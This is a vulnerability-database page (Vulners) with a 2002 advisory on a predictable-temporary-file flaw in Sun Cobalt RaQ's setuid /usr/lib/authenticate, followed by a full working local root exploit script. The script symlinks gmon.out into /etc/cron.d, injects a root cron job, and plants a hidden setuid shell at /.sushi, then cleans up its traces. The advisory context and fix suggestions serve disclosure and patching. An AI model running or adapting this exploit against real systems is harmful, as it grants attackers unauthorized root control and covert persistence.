Vulners
Lucene search
Sun Cobalt RaQ 4.0 - Predictable Temporary Filename Symbolic Link Attack
source: https://www.securityfocus.com/bid/5529/info
A vulnerability has been reported in Cobalt RaQ that may allow attackers to obtain elevated privileges. The vulnerability exists in the /usr/lib/authenticate utility which is used by Apache for authentication purposes. Reportedly, the utility creates temporary files with predictable names with world-writeable permissions. This vulnerability is further exacerbated by the fact that /usr/lib/authenticate is a setuid root binary.
#!/bin/sh
#
# Cobalt Linux 6.0 Local Root Exploit
#
# Effects: <= apache-1.3.20-RaQ4_1C3 (AFAIK all Cobalt Linux Apache ;)
# Quick Fix: su - root -c "chmod 755 /usr/lib/authenticate"
#
# Problem Source Code:
# fd = open("gmon.out", O_WRONLY|O_CREAT|O_TRUNC, 0666);
#
# Suggested Code:
# fd = mkstemp("/tmp/gmon.out-XXXXXX");
#
# Still need help Cobalt developers? Ok:
# man 3 tmpfile; man 2 open; echo "Thanks core"
#
# by Charles Stevenson <[email protected]>
#
# Fri Jun 28 03:35:53 MDT 2002
# - initial version
# Sun Jul 7 20:12:41 MDT 2002
# - added some features for robustness
echo "RaQFuCK.sh by core"
target="/usr/lib/authenticate"
tempdir="/tmp"
if [ -u /.sushi ] ; then
exec /.sushi
fi
printf "Checking for $target..."
if [ -f "$target" ] ; then
echo "done."
else
echo "NO!"
exit 1
fi
printf "Checking if $target is setuid root..."
if [ -u "$target" ] ; then
echo "done."
else
echo "NO! Hrm... does this admin have a clue???"
exit 1
fi
if [ ! -d "$tempdir/core" ]; then
printf "Creating $tempdir/core..."
if ! mkdir "$tempdir/core" 2>/dev/null ; then
echo "FAILED!" ; exit 1
fi
echo "done."
fi
printf "Changing directory to $tempdir/core..."
if ! cd "$tempdir/core" 2>/dev/null ; then
echo "FAILED!" ; exit 1
else
echo "done."
fi
printf "Creating cron.d symlink..."
if ! ln -fs /etc/cron.d/core gmon.out 2>/dev/null; then
echo "FAILED!" ; exit 1
else
echo "done."
fi
printf "Changing umask..."
if ! umask 000 ; then
echo "FAILED!" ; exit 1
else
echo "done."
fi
printf "Compiling root shell..."
cat >sushi.c <<EOF
#include <unistd.h>
int main (int argc, char **argv, char **envp) {
setuid(0);
setgid(0);
execve("/bin/sh",argv,envp);
return -1;
}
EOF
if ! cc sushi.c -o sushi 2>/dev/null; then
echo "FAILED!" ; exit 1
else
echo "done."
fi
printf "Compiling cron takeover..."
cat >takeover.c <<EOF
#include <stdlib.h>
main() { system("cp $tempdir/core/sushi /.sushi ; chmod 6777 /.sushi"); }
EOF
if ! cc takeover.c -o own 2>/dev/null; then
echo "FAILED!" ; exit 1
fi
echo "done."
printf "Performing symlink attack..."
printf "\n\n\n\n" | "$target"
if [ -u /etc/cron.d/core ] ; then
echo "SYMLINK ATTACK FAILED!" && exit 1
else
echo "done."
fi
printf "Setting up evil cron job..."
cat >croncore <<EOF
*/1 * * * * root if [ -x "$tempdir/core/own" ] ; then "$tempdir/core/own";
fi
EOF
if ! cat croncore 2>/dev/null >/etc/cron.d/core; then
echo "FAILED!" ; exit 1
else
echo "done."
fi
printf "Waiting for root shell"
while [ ! -u /.sushi ] ; do
sleep 1 ; printf "."
done
echo "done."
cd /
printf "Cleaning up real quick..."
if ! /.sushi -c "rm -rf $tempdir/core /etc/cron.d/core"; then
echo "FAILED??? Fuck it!"
else
echo "done."
fi
echo "Spawning root shell!!! God Damn! I say GOD DAMN!!"
if ! exec /.sushi -i; then
echo "Exec Failed!!! BUMMER!" ; exit 1
fiData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
28 Jun 2002 00:00Current
7.4High risk
Vulners AI Score7.4